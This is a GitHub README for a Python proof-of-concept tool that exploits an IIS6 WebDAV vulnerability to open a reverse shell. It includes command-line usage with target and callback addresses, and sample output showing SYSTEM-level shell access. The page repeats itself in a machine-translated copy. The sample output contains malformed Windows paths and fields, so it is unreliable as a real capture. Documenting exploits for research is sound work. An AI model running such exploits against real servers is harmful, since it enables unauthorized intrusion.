Skip to content

Latest commit

 

History

History
157 lines (104 loc) · 5.23 KB

README.md

File metadata and controls

157 lines (104 loc) · 5.23 KB

EN

GenWebDavIISExploit is a PoC tool demonstrating an exploit for a known vulnerability in the WebDAV component of IIS6. This tool is designed for educational and research purposes to showcase how the vulnerability can be leveraged to execute arbitrary code on a remote server.

Disclaimer

This project is intended for educational purposes only. Use this tool responsibly and only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Features

  • Remote code execution on vulnerable IIS6 WebDAV servers.
  • Dynamic payload generation with user-specified reverse IP and port.
  • Easy-to-use command-line interface for rapid exploitation.

Prerequisites

  • Python 3.x: Ensure that Python 3 is installed on your system.
  • Network Access: Ability to connect to the target machine's IP and port.

Usage

Command-Line Arguments

  • Target IP: The IP address of the target IIS6 WebDAV server.
  • Target Port: The port number on which the WebDAV service is running (usually 80).
  • Reverse IP: Your IP address where the reverse shell should connect.
  • Reverse Port: The port number on your system to receive the reverse shell.

Example

python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

Usage Example

python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

Example output

$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received a connection back from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS-127.00.1 . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet mask . . . . . . . . . . . . . . . . : 255.255.255.0
      Main gateway . . . . . . . . . . . . . . . . : 192.168.1.1

Notes

  • Ensure you have a listener running on the specified reverse port to capture the incoming reverse shell.
  • Use this tool only on authorized systems to test for vulnerabilities.

RU

GenWebDavIISExploit is a PoC tool that demonstrates exploitation of a known vulnerability in the WebDAV component on IIS6. This tool is created for educational and research purposes to show how the vulnerability can be exploited to execute arbitrary code on a remote server.

Translated with DeepL.com (free version)

Disclaimer

This project is intended for educational purposes only. Use this tool responsibly and only on systems that you own or have explicit permission to test. Unauthorized access to computer systems is illegal.

Features

  • Execution of remote code on vulnerable IIS6 WebDAV servers.
  • Dynamic payload code generation with IP and port specification for the reverse connection.
  • Simple command line interface for quick use.

Requirements

  • Python 3.x: Make sure you have Python 3 installed.
  • Network Access: Ability to connect to the target machine's IP address and port.

Usage

Command line arguments

  • Target IP: IP address of the target IIS6 WebDAV server.
  • Target Port: The port number on which the WebDAV service is running (usually 80).
  • Reverse IP: Your IP address to which the reverse connection should be established.
  • Reverse Port: The port number on your system to receive the reverse connection.

Example

python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>

Example usage

python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
```

## Example output
```
$ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444

[*] Connecting to target 192.168.1.10 on port 80...
[*] Sending a specially crafted HTTP request to exploit the vulnerability...
[*] Payload length: 1744 bytes
[*] Waiting for a return connection...

Translated with DeepL.com (free version)

[+] Response from target:
HTTP/1.1 200 OK
Content-Length: 123
Server: Microsoft-IIS/6.0

[+] Received back connection from 192.168.1.10:12345
[+] Remote access successfully established!

C:Windows\Windows\system32> whoami
nt authority\system

C:\Windows/system32> ipconfig
Windows IP Configuration

   Ethernet Local Area Connection adapter:
      DNS connection suffix . . . . . . . : example.local
      IPv4 address. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . : 192.168.1.10
      Subnet Mask . . . . . . . . . . . . . . . : 255.255.255.0
      Default Gateway . . . . . . . . . . . . . . . . : 192.168.1.1
    
```


## Notes

- Make sure you have a listener running on the specified reverse port to intercept the incoming reverse connection.
- Use this tool only on authorized systems to check for vulnerabilities.